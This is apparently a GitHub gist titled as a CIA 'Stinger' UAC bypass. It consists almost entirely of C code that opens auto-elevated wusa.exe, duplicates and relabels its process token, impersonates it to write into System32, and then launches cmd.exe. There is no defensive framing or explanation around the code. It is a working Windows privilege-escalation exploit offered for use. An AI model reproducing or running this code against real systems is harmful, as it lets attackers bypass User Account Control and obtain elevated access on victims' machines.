Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CIA Stinger UAC bypass (likely)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WCHAR szBuffer[MAX_PATH];
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
do {
hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hTest != INVALID_HANDLE_VALUE) {
CloseHandle(hTest);
}
else {
MessageBox(GetDesktopWindow(), L"Access denied", NULL, MB_OK);
}
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = L"wusa.exe";
shinfo.nShow = SW_SHOW;
if (!ShellExecuteEx(&shinfo))
break;
if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
break;
if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
break;
if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,
0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
{
break;
}
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml,
sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
if (!NT_SUCCESS(Status))
break;
if (!ImpersonateLoggedOnUser(hNewToken))
break;
hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hTest != INVALID_HANDLE_VALUE) {
MessageBox(GetDesktopWindow(), L"Hit", NULL, MB_OK);
CloseHandle(hTest);
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
_strcpy(szBuffer, L"cmd.exe");
CreateProcessWithLogonW(L"test", L"test", L"test", LOGON_NETCREDENTIALS_ONLY, szBuffer, NULL, 0, NULL, NULL, &si, &pi);
}
} while (bCond);
if (shinfo.hProcess) CloseHandle(shinfo.hProcess);
if (hProcessToken) CloseHandle(hProcessToken);
if (hNewToken) CloseHandle(hNewToken);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment